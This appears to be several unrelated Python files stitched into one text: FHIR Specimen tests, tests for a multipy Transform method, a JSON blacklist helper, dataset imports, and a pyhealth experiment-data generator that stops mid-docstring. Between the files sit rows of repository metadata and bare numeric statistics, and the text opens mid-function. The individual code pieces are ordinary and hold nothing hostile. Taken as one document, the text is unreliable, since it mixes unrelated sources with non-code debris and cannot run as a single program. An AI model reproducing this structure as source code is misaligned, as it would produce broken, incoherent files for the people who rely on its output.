    accession = inst.accessionIdentifier
    self.assertEqual(accession.system, "http://acme.com/labs/accession-ids")
    self.assertEqual(accession.value, "20150816-00124")
    collected = inst.collection.collectedDateTime
    self.assertEqual(collected.date, FHIRDate("2015-08-16T06:40:17Z").date)
    self.assertEqual(collected.as_json(), "2015-08-16T06:40:17Z")
    container_coding = inst.container[0].type.coding[0]
    self.assertEqual(container_coding.code, "SST")
    self.assertEqual(container_coding.display, "Serum Separator Tube")
    self.assertEqual(container_coding.system, "http://acme.com/labs")
    self.assertEqual(inst.id, "sst")
    tag = inst.meta.tag[0]
    self.assertEqual(tag.code, "HTEST")
    self.assertEqual(tag.display, "test health data")
    self.assertEqual(tag.system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
    self.assertEqual(inst.text.status, "generated")
    type_coding = inst.type.coding[0]
    self.assertEqual(type_coding.code, "119364003")
    self.assertEqual(type_coding.display, "Serum sample")
    self.assertEqual(type_coding.system, "http://snomed.info/sct")
def testSpecimen5(self):
    """Round-trip specimen-example.json: parse, check, serialize, re-parse, check."""
    instance = self.instantiate_from("specimen-example.json")
    self.assertIsNotNone(instance, "Must have instantiated a Specimen instance")
    self.implSpecimen5(instance)
    payload = instance.as_json()
    self.assertEqual("Specimen", payload["resourceType"])
    rehydrated = specimen.Specimen(payload)
    self.implSpecimen5(rehydrated)

def implSpecimen5(self, inst):
    """Assert the field values expected for the venous-blood example."""
    accession = inst.accessionIdentifier
    self.assertEqual(accession.system, "http://lab.acme.org/specimens/2011")
    self.assertEqual(accession.value, "X352356")
    collection = inst.collection
    body_site = collection.bodySite
    self.assertEqual(body_site.coding[0].code, "49852007")
    self.assertEqual(body_site.coding[0].display, "Structure of median cubital vein (body structure)")
    self.assertEqual(body_site.coding[0].system, "http://snomed.info/sct")
    self.assertEqual(body_site.text, "Right median cubital vein")
    self.assertEqual(collection.collectedDateTime.date, FHIRDate("2011-05-30T06:15:00Z").date)
    self.assertEqual(collection.collectedDateTime.as_json(), "2011-05-30T06:15:00Z")
    self.assertEqual(collection.method.coding[0].code, "LNV")
    self.assertEqual(collection.method.coding[0].system, "http://terminology.hl7.org/CodeSystem/v2-0488")
    self.assertEqual(collection.quantity.unit, "mL")
    self.assertEqual(collection.quantity.value, 6)
    self.assertEqual(inst.contained[0].id, "hep")
    container = inst.container[0]
    self.assertEqual(container.capacity.unit, "mL")
    self.assertEqual(container.capacity.value, 10)
    self.assertEqual(container.description, "Green Gel tube")
    self.assertEqual(container.identifier[0].value, "48736-15394-75465")
    self.assertEqual(container.specimenQuantity.unit, "mL")
    self.assertEqual(container.specimenQuantity.value, 6)
    self.assertEqual(container.type.text, "Vacutainer")
    self.assertEqual(inst.id, "101")
    self.assertEqual(inst.identifier[0].system, "http://ehr.acme.org/identifiers/collections")
    self.assertEqual(inst.identifier[0].value, "23234352356")
    tag = inst.meta.tag[0]
    self.assertEqual(tag.code, "HTEST")
    self.assertEqual(tag.display, "test health data")
    self.assertEqual(tag.system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
    self.assertEqual(inst.note[0].text, "Specimen is grossly lipemic")
    self.assertEqual(inst.receivedTime.date, FHIRDate("2011-03-04T07:03:00Z").date)
    self.assertEqual(inst.receivedTime.as_json(), "2011-03-04T07:03:00Z")
    self.assertEqual(inst.status, "available")
    self.assertEqual(inst.text.status, "generated")
    type_coding = inst.type.coding[0]
    self.assertEqual(type_coding.code, "122555007")
    self.assertEqual(type_coding.display, "Venous blood specimen")
    self.assertEqual(type_coding.system, "http://snomed.info/sct")
| 58.266667
| 121
| 0.689403
| 1,389
| 11,362
| 5.62347
| 0.156947
| 0.224683
| 0.270004
| 0.074254
| 0.816285
| 0.761618
| 0.735629
| 0.59621
| 0.568045
| 0.464473
| 0
| 0.056762
| 0.161151
| 11,362
| 194
| 122
| 58.56701
| 0.762774
| 0.010474
| 0
| 0.337278
| 1
| 0
| 0.219187
| 0.01415
| 0
| 0
| 0
| 0
| 0.721893
| 1
| 0.065089
| false
| 0
| 0.035503
| 0
| 0.112426
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98d554d79299426017272bd9624e0f22cbdf0f75
| 4,606
|
py
|
Python
|
tests/Transform/test_Transform__diffusive_flux_mass_molar_to_mass_mass.py
|
kamilazdybal/multipy
|
ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9
|
[
"MIT"
] | null | null | null |
tests/Transform/test_Transform__diffusive_flux_mass_molar_to_mass_mass.py
|
kamilazdybal/multipy
|
ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9
|
[
"MIT"
] | null | null | null |
tests/Transform/test_Transform__diffusive_flux_mass_molar_to_mass_mass.py
|
kamilazdybal/multipy
|
ebdcddb63bfb1cd647ca99bbf9002b04a9b50ed9
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import multipy
################################################################################
################################################################################
####
#### Class: Transform
####
################################################################################
################################################################################
class Transform(unittest.TestCase):
    """Tests for multipy.Transform.diffusive_flux_mass_molar_to_mass_mass."""

    def test_Transform__diffusive_flux_mass_molar_to_mass_mass__allowed_calls(self):
        """Valid (n_species, n_observations) inputs yield an (n-1, n-1, n_obs) array."""
        for n_species, n_observations in ((5, 100), (2, 100), (2, 1)):
            X = np.random.rand(n_species, n_observations)
            Y = np.random.rand(n_species, n_observations)
            try:
                transform = multipy.Transform()
                B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)
                (n_species_1, n_species_2, n_obs_out) = np.shape(B_ou)
                self.assertTrue(n_species_1 == n_species - 1)
                self.assertTrue(n_species_2 == n_species - 1)
                self.assertTrue(n_obs_out == n_observations)
            except Exception:
                self.assertTrue(False)

    def test_Transform__diffusive_flux_mass_molar_to_mass_mass__not_allowed_calls(self):
        """Malformed or mismatched inputs must raise ValueError."""
        transform = multipy.Transform()
        invalid_pairs = [
            (np.random.rand(1, 100), np.random.rand(1, 100)),   # too few species
            (np.random.rand(5, 100), np.random.rand(4, 100)),   # species mismatch
            (np.random.rand(5, 100), np.random.rand(1, 100)),
            (np.random.rand(1, 100), np.random.rand(5, 100)),
            (np.random.rand(100), np.random.rand(5, 100)),      # 1-D first argument
            (np.random.rand(5, 100), np.random.rand(100)),      # 1-D second argument
            (np.random.rand(5, 100), [1, 2, 3, 4, 5]),          # non-array second argument
            (np.random.rand(5, 100), None),
            ([1, 2, 3, 4, 5], np.random.rand(5, 100)),          # non-array first argument
            (None, np.random.rand(5, 100)),
        ]
        for X, Y in invalid_pairs:
            with self.assertRaises(ValueError):
                B_ou = transform.diffusive_flux_mass_molar_to_mass_mass(X, Y)

    def test_Transform__diffusive_flux_mass_molar_to_mass_mass__computation(self):
        # Placeholder: numerical correctness not yet covered.
        pass

    def test_Transform__diffusive_flux_mass_molar_to_mass_mass__inverses(self):
        # Placeholder: inverse-transform consistency not yet covered.
        pass
################################################################################
################################################################################
| 35.160305
| 88
| 0.506079
| 506
| 4,606
| 4.268775
| 0.094862
| 0.074074
| 0.111111
| 0.20463
| 0.909722
| 0.863426
| 0.863426
| 0.862963
| 0.862963
| 0.862963
| 0
| 0.029822
| 0.20647
| 4,606
| 130
| 89
| 35.430769
| 0.561149
| 0.003474
| 0
| 0.717949
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.282051
| 1
| 0.051282
| false
| 0.025641
| 0.038462
| 0
| 0.102564
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c74bd4ff416dfff1676d4a89fc72fea46c671413
| 574
|
py
|
Python
|
helpers/json_manager.py
|
xxopcode90xx/DiscordChatBotProject
|
d9577fabe9d5b57ad31c36a6abcc8c907a15c69d
|
[
"Apache-2.0"
] | 491
|
2020-05-31T07:24:46.000Z
|
2022-03-31T21:56:40.000Z
|
helpers/json_manager.py
|
hhhhhhhhhhh22/unicorn
|
2f3e6ed3de993c793b541d1ca84b06609f0a4f9a
|
[
"Apache-2.0"
] | 51
|
2020-05-28T23:23:49.000Z
|
2022-03-13T13:35:01.000Z
|
helpers/json_manager.py
|
hhhhhhhhhhh22/unicorn
|
2f3e6ed3de993c793b541d1ca84b06609f0a4f9a
|
[
"Apache-2.0"
] | 175
|
2020-02-04T03:59:21.000Z
|
2022-03-30T00:09:19.000Z
|
import json
def add_user_to_blacklist(user_id: int) -> None:
    """Append *user_id* to the "ids" list stored in blacklist.json.

    Raises FileNotFoundError if blacklist.json does not exist and
    KeyError if the document has no "ids" entry.
    """
    # Read the whole document first, then rewrite the file in one pass.
    # The original opened the file in "r+" mode but never wrote through
    # that handle, re-opened it in "w" mode while the first handle was
    # still open, and called seek(0) on the freshly truncated file — all
    # redundant.
    with open("blacklist.json", "r") as file:
        file_data = json.load(file)
    file_data["ids"].append(user_id)
    with open("blacklist.json", "w") as file:
        json.dump(file_data, file, indent=4)
def remove_user_from_blacklist(user_id: int) -> None:
    """Remove *user_id* from the "ids" list stored in blacklist.json.

    Raises FileNotFoundError if blacklist.json does not exist, KeyError
    if the document has no "ids" entry, and ValueError (from
    list.remove) if the id is not present.
    """
    # Load, mutate in memory, then rewrite the file once.  The original
    # re-opened the file in "w" mode while the read handle was still open
    # and issued a no-op seek(0) after truncation.
    with open("blacklist.json", "r") as file:
        file_data = json.load(file)
    file_data["ids"].remove(user_id)
    with open("blacklist.json", "w") as file:
        json.dump(file_data, file, indent=4)
| 28.7
| 46
| 0.62892
| 88
| 574
| 3.920455
| 0.295455
| 0.13913
| 0.197101
| 0.243478
| 0.852174
| 0.852174
| 0.852174
| 0.852174
| 0.852174
| 0.852174
| 0
| 0.008969
| 0.222997
| 574
| 19
| 47
| 30.210526
| 0.764574
| 0
| 0
| 0.533333
| 0
| 0
| 0.116725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.066667
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c7b7c2481d60d51b4ac7d84a7ce49dfce7550bab
| 216
|
py
|
Python
|
dataset/__init__.py
|
sunchengrong/PSENet
|
adb1a6e62d858b368449c26fcddebc3147efef8b
|
[
"Apache-2.0"
] | 25
|
2020-02-29T12:14:10.000Z
|
2020-04-24T07:56:06.000Z
|
dataset/__init__.py
|
sunchengrong/PSENet
|
adb1a6e62d858b368449c26fcddebc3147efef8b
|
[
"Apache-2.0"
] | 33
|
2020-12-10T19:15:39.000Z
|
2022-03-12T00:17:30.000Z
|
dataset/__init__.py
|
sunchengrong/PSENet
|
adb1a6e62d858b368449c26fcddebc3147efef8b
|
[
"Apache-2.0"
] | 4
|
2020-02-29T12:14:18.000Z
|
2020-04-12T12:26:50.000Z
|
from dataset.icdar2015_loader import IC15Loader
from dataset.icdar2015_test_loader import IC15TestLoader
from dataset.ctw1500_loader import CTW1500Loader
from dataset.ctw1500_test_loader import CTW1500TestLoader
| 43.2
| 57
| 0.888889
| 26
| 216
| 7.153846
| 0.423077
| 0.236559
| 0.215054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0.092593
| 216
| 5
| 58
| 43.2
| 0.806122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c7b864ca14a3bc9daafa90eb5dc006358813829f
| 172
|
py
|
Python
|
client/client.py
|
areed1192/tcg-player-api
|
93f7de10dee876955d1ef8a2777735343c887c9e
|
[
"MIT"
] | 26
|
2020-09-09T14:58:02.000Z
|
2022-03-11T14:50:16.000Z
|
client/client.py
|
areed1192/tcg-player-api
|
93f7de10dee876955d1ef8a2777735343c887c9e
|
[
"MIT"
] | 1
|
2020-10-11T10:02:22.000Z
|
2020-10-11T10:02:22.000Z
|
client/client.py
|
areed1192/tcg-player-api
|
93f7de10dee876955d1ef8a2777735343c887c9e
|
[
"MIT"
] | 16
|
2020-12-15T17:30:05.000Z
|
2022-03-08T08:55:38.000Z
|
from typing import List
from typing import Dict
from typing import Union
class MyNewClass():
    """Minimal placeholder class (constructor and repr stubs)."""

    def __init__(self):
        # No state to initialize yet.
        pass

    def __repr__(self):
        # Bug fix: __repr__ must return a str.  The original body was
        # `pass`, so repr(instance) raised
        # "TypeError: __repr__ returned non-string (type NoneType)".
        return "{}()".format(type(self).__name__)
| 12.285714
| 24
| 0.662791
| 22
| 172
| 4.818182
| 0.590909
| 0.283019
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.284884
| 172
| 13
| 25
| 13.230769
| 0.861789
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.375
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
c7b87b9edd9ad1bc77c2956fe759474d59a68451
| 30,773
|
py
|
Python
|
pyhealth/data/expdata_generator.py
|
Abhinav43/PyHealth
|
5aa9816f76990d221d79340b331c18dfa10adcb3
|
[
"BSD-2-Clause"
] | 485
|
2020-08-03T20:04:21.000Z
|
2022-02-25T13:35:43.000Z
|
pyhealth/data/expdata_generator.py
|
Abhinav43/PyHealth
|
5aa9816f76990d221d79340b331c18dfa10adcb3
|
[
"BSD-2-Clause"
] | 6
|
2020-08-06T01:07:45.000Z
|
2021-10-15T21:49:42.000Z
|
pyhealth/data/expdata_generator.py
|
Abhinav43/PyHealth
|
5aa9816f76990d221d79340b331c18dfa10adcb3
|
[
"BSD-2-Clause"
] | 98
|
2020-08-04T01:04:38.000Z
|
2022-02-09T10:36:03.000Z
|
# -*- coding: utf-8 -*-
# Author: Zhi Qiao <mingshan_ai@163.com>
# License: BSD 2 clause
import os
import csv
import pickle
import random
import numpy as np
import pandas as pd
import tqdm
from tqdm._tqdm import trange
import time
try:
from ..utils.check import *
except:
from pyhealth.utils.check import *
class imagedata:
    # Experiment-data generator for image-style datasets: x entries are
    # file paths, y entries are float label vectors.  Splits are pickled
    # under <root_dir>/experiments_data/<expdata_id>/ and can be restored
    # with load_exp_data().

    def __init__(self, expdata_id, root_dir='.'):
        """
        experiment data generat class for cms datasets

        Parameters
        ----------
        exp_id : str, optional (default='init.test')
            name of current experiment
        """
        self.expdata_id = expdata_id
        # Validate the experiment-data identifier/directory before use.
        check_expdata_dir(expdata_id = expdata_id)
        self.root_dir = root_dir
        # All generated pickles live under this directory.
        self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
        print(
            'Current ExpData_ID: {0} --- Target for CMS'.format(
                self.expdata_id))

    def get_exp_data(self,
                     sel_task='diagnose',
                     shuffle=True,
                     split_ratio=[0.64, 0.16, 0.2],
                     data_root = '',
                     n_limit = -1):
        """
        Build train/valid/test splits from data_root and pickle them.

        Parameters
        ----------
        task : str, optional (default='phenotyping')
            name of current healthcare task

        shuffle : bool, optional (default=True)
            determine whether shuffle data or not

        split_ratio : list, optional (default=[0.64,0.16,0.2])
            used for split whole data into train/valid/test

        data_root : str, (default='')
            use data in data_root

        n_limit : int, optional (default = -1)
            used for sample N-data not for all data, if n_limit==-1, use all data
        """
        self.sel_task = sel_task
        if data_root == '':
            raise Exception('fill in correct data_root')
        all_list = []
        l_list = []  # NOTE(review): unused in this class; kept as-is
        episode_dir = os.path.join(data_root, 'x_data')
        feat_n, label_n = 0, 0
        # Label CSV: first column is the x-data file name, remaining
        # columns are the (numeric) labels for that sample.
        label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
                                             self.sel_task + '.csv')).values
        for row_id in trange(len(label_seq)):
            # Optional cap on sample count (n_limit == -1 means use all).
            if n_limit>0 and row_id>n_limit:
                break
            time.sleep(0.01)  # NOTE(review): only slows the progress bar
            row = label_seq[row_id, :]
            concrete_path = os.path.join(episode_dir, row[0])
            # Skip label rows whose x-data file is missing on disk.
            if os.path.exists(concrete_path) is False:
                continue
            all_list.append([concrete_path] + row[1:].astype(float).tolist())
            label_n = len(row[1:])
        # shuffle the list
        if shuffle:
            random.shuffle(all_list)
        N = len(all_list)
        # Separate back into path list (x) and float label vectors (y).
        x_list = []
        y_list = []
        for item in all_list:
            x_list.append(item[0])
            y_list.append(np.array(item[1:]).astype(float))
        # Contiguous split after the optional shuffle: train, valid, test.
        train_ratio = split_ratio[0]
        valid_ratio = split_ratio[1]
        training_x = x_list[: int(train_ratio * N)]
        validing_x = x_list[int(train_ratio * N): int(
            (train_ratio + valid_ratio) * N)]
        testing_x = x_list[int((train_ratio + valid_ratio) * N):]
        training_y = y_list[: int(train_ratio * N)]
        validing_y = y_list[int(train_ratio * N): int(
            (train_ratio + valid_ratio) * N)]
        testing_y = y_list[int((train_ratio + valid_ratio) * N):]
        if os.path.exists(self.expdata_dir) is False:
            os.makedirs(self.expdata_dir)
        # Persist each split so load_exp_data() can restore it later.
        # NOTE(review): file handles from open(...) are never closed here.
        pickle.dump(training_x, open(
            os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
        pickle.dump(validing_x, open(
            os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
        pickle.dump(testing_x, open(
            os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
        print ('finished X generate')
        pickle.dump(training_y, open(
            os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
        pickle.dump(validing_y, open(
            os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
        pickle.dump(testing_y, open(
            os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
        print ('finished Y generate')
        # Summary statistics, also pickled alongside the splits.
        # NOTE(review): 'raio' looks like a typo for 'ratio'; kept because
        # previously persisted pickles use this key.
        expdata_statistic = {
            'task':self.sel_task,
            'raio': split_ratio,
            'label_n': label_n,
            'len_train': len(training_x),
            'len_valid': len(validing_x),
            'len_test': len(testing_x)
            }
        pickle.dump(expdata_statistic, open(
            os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
        # Expose the splits on the instance for immediate use.
        self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
        print('generate finished')
        print('target Task:', expdata_statistic['task'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def load_exp_data(self):
        """Restore previously pickled splits from self.expdata_dir."""
        if os.path.exists(self.expdata_dir) is False:
            raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
        training_x = pickle.load(open(
            os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
        validing_x = pickle.load(open(
            os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
        testing_x = pickle.load(open(
            os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
        training_y = pickle.load(open(
            os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
        validing_y = pickle.load(open(
            os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
        testing_y = pickle.load(open(
            os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
        expdata_statistic = pickle.load(open(
            os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
        label_n = expdata_statistic['label_n']
        self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
        print('load finished')
        print('target Task:', expdata_statistic['task'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def show_data(self, k=3):
        """
        Print the first k samples of each split.

        Parameters
        ----------
        k : int, optional (default=3)
            fetch k sample data for show
        """
        print('------------Train--------------')
        print('x_data', self.train['x'][:k])
        print('y_data', self.train['y'][:k])
        print('------------Valid--------------')
        print('x_data', self.valid['x'][:k])
        print('y_data', self.valid['y'][:k])
        print('------------Test--------------')
        print('x_data', self.test['x'][:k])
        print('y_data', self.test['y'][:k])
class sequencedata:
    # Experiment-data generator for sequence datasets (e.g. MIMIC episode
    # CSVs): x entries are file paths, l entries are sequence lengths,
    # y entries are float label vectors.  Splits are pickled under
    # <root_dir>/experiments_data/<expdata_id>/.

    def __init__(self, expdata_id, root_dir='.'):
        """
        experiment data generat class for cms datasets

        Parameters
        ----------
        exp_id : str, optional (default='init.test')
            name of current experiment
        """
        self.expdata_id = expdata_id
        # Validate the experiment-data identifier/directory before use.
        check_expdata_dir(expdata_id = expdata_id)
        self.root_dir = root_dir
        self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
        print(
            'Current ExpData_ID: {0} --- Target for MIMIC'.format(
                self.expdata_id))

    def get_exp_data(self,
                     sel_task='phenotyping',
                     shuffle=True,
                     split_ratio=[0.64, 0.16, 0.2],
                     data_root = '',
                     n_limit = -1):
        """
        Build train/valid/test splits (x, y, and sequence length l) and pickle them.

        Parameters
        ----------
        task : str, optional (default='phenotyping')
            name of current healthcare task

        shuffle : bool, optional (default=True)
            determine whether shuffle data or not

        split_ratio : list, optional (default=[0.64,0.16,0.2])
            used for split whole data into train/valid/test

        data_root : str, optional (default='')
            if data_root=='', use data in ./datasets; else use data in data_root

        n_limit : int, optional (default = -1)
            used for sample N-data not for all data, if n_limit==-1, use all data
        """
        self.sel_task = sel_task
        if data_root == '':
            raise Exception('fill in correct data_root')
        all_list = []
        l_list = []
        episode_dir = os.path.join(data_root, 'x_data')
        feat_n, label_n = 0, 0
        # Label CSV: first column is the episode file name, remaining
        # columns are the labels for that episode.
        label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
                                             self.sel_task + '.csv')).values
        for row_id in trange(len(label_seq)):
            # Optional cap on sample count (n_limit == -1 means use all).
            if n_limit>0 and row_id>n_limit:
                break
            time.sleep(0.01)  # NOTE(review): only slows the progress bar
            row = label_seq[row_id, :]
            concrete_path = os.path.join(episode_dir, row[0])
            if os.path.exists(concrete_path) is False:
                continue
            # Episode CSV shape gives sequence length and feature count.
            seq_l, feat_n_all = pd.read_csv(concrete_path).shape
            # Discard degenerate episodes with fewer than 2 time steps.
            if seq_l < 2:
                continue
            all_list.append([concrete_path] + [seq_l] + row[1:].astype(float).tolist())
            label_n = len(row[1:])
            # First CSV column is presumably an index/time column — TODO confirm.
            feat_n = feat_n_all - 1
        # shuffle the list
        if shuffle:
            random.shuffle(all_list)
        N = len(all_list)
        # Separate into path (x), sequence length (l), and labels (y).
        x_list = []
        y_list = []
        l_list = []
        for item in all_list:
            x_list.append(item[0])
            l_list.append(item[1])
            y_list.append(np.array(item[2:]).astype(float))
        # Contiguous split after the optional shuffle: train, valid, test.
        train_ratio = split_ratio[0]
        valid_ratio = split_ratio[1]
        training_x = x_list[: int(train_ratio * N)]
        validing_x = x_list[int(train_ratio * N): int(
            (train_ratio + valid_ratio) * N)]
        testing_x = x_list[int((train_ratio + valid_ratio) * N):]
        training_y = y_list[: int(train_ratio * N)]
        validing_y = y_list[int(train_ratio * N): int(
            (train_ratio + valid_ratio) * N)]
        testing_y = y_list[int((train_ratio + valid_ratio) * N):]
        training_l = l_list[: int(train_ratio * N)]
        validing_l = l_list[int(train_ratio * N): int(
            (train_ratio + valid_ratio) * N)]
        testing_l = l_list[int((train_ratio + valid_ratio) * N):]
        if os.path.exists(self.expdata_dir) is False:
            os.makedirs(self.expdata_dir)
        # Persist each split so load_exp_data() can restore it later.
        # NOTE(review): file handles from open(...) are never closed here.
        pickle.dump(training_x, open(
            os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
        pickle.dump(validing_x, open(
            os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
        pickle.dump(testing_x, open(
            os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
        print ('finished X generate')
        pickle.dump(training_y, open(
            os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
        pickle.dump(validing_y, open(
            os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
        pickle.dump(testing_y, open(
            os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
        print ('finished Y generate')
        pickle.dump(training_l, open(
            os.path.join(self.expdata_dir, 'train_l.pkl'), 'wb'))
        pickle.dump(validing_l, open(
            os.path.join(self.expdata_dir, 'valid_l.pkl'), 'wb'))
        pickle.dump(testing_l, open(
            os.path.join(self.expdata_dir, 'test_l.pkl'), 'wb'))
        print ('finished L generate')
        # NOTE(review): 'raio' looks like a typo for 'ratio'; kept because
        # previously persisted pickles use this key.
        expdata_statistic = {
            'task':self.sel_task,
            'raio': split_ratio,
            'feat_n': feat_n,
            'label_n': label_n,
            'len_train': len(training_x),
            'len_valid': len(validing_x),
            'len_test': len(testing_x)
            }
        pickle.dump(expdata_statistic, open(
            os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
        # Expose the splits on the instance for immediate use.
        self.train = {'x': training_x, 'y': training_y, 'l': training_l,
                      'feat_n': feat_n, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
                      'feat_n': feat_n, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
                     'feat_n': feat_n, 'label_n': label_n}
        print('generate finished')
        print('target Task:', expdata_statistic['task'])
        print('N of features:', expdata_statistic['feat_n'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def load_exp_data(self):
        """Restore previously pickled splits (x, y, l) from self.expdata_dir."""
        if os.path.exists(self.expdata_dir) is False:
            raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
        training_x = pickle.load(open(
            os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
        validing_x = pickle.load(open(
            os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
        testing_x = pickle.load(open(
            os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
        training_y = pickle.load(open(
            os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
        validing_y = pickle.load(open(
            os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
        testing_y = pickle.load(open(
            os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
        training_l = pickle.load(open(
            os.path.join(self.expdata_dir, 'train_l.pkl'), 'rb'))
        validing_l = pickle.load(open(
            os.path.join(self.expdata_dir, 'valid_l.pkl'), 'rb'))
        testing_l = pickle.load(open(
            os.path.join(self.expdata_dir, 'test_l.pkl'), 'rb'))
        expdata_statistic = pickle.load(open(
            os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
        feat_n = expdata_statistic['feat_n']
        label_n = expdata_statistic['label_n']
        self.train = {'x': training_x, 'y': training_y, 'l': training_l,
                      'feat_n': feat_n, 'label_n': label_n}
        self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
                      'feat_n': feat_n, 'label_n': label_n}
        self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
                     'feat_n': feat_n, 'label_n': label_n}
        print('load finished')
        print('target Task:', expdata_statistic['task'])
        print('N of features:', expdata_statistic['feat_n'])
        print('N of labels:', expdata_statistic['label_n'])
        print('N of TrainData:', expdata_statistic['len_train'])
        print('N of ValidData:', expdata_statistic['len_valid'])
        print('N of TestData:', expdata_statistic['len_test'])

    def show_data(self, k=3):
        """
        Print the first k samples of each split.

        Parameters
        ----------
        k : int, optional (default=3)
            fetch k sample data for show
        """
        print('------------Train--------------')
        print('x_data', self.train['x'][:k])
        print('y_data', self.train['y'][:k])
        print('l_data', self.train['l'][:k])
        print('------------Valid--------------')
        print('x_data', self.valid['x'][:k])
        print('y_data', self.valid['y'][:k])
        print('l_data', self.valid['l'][:k])
        print('------------Test--------------')
        print('x_data', self.test['x'][:k])
        print('y_data', self.test['y'][:k])
        print('l_data', self.test['l'][:k])
class ecgdata:
    """Experiment-data generation/loading helper for ECG datasets.

    Splits a feature matrix (x_data/feat.pkl) and a task label matrix
    (y_data/<task>.pkl) into train/valid/test partitions, persists them as
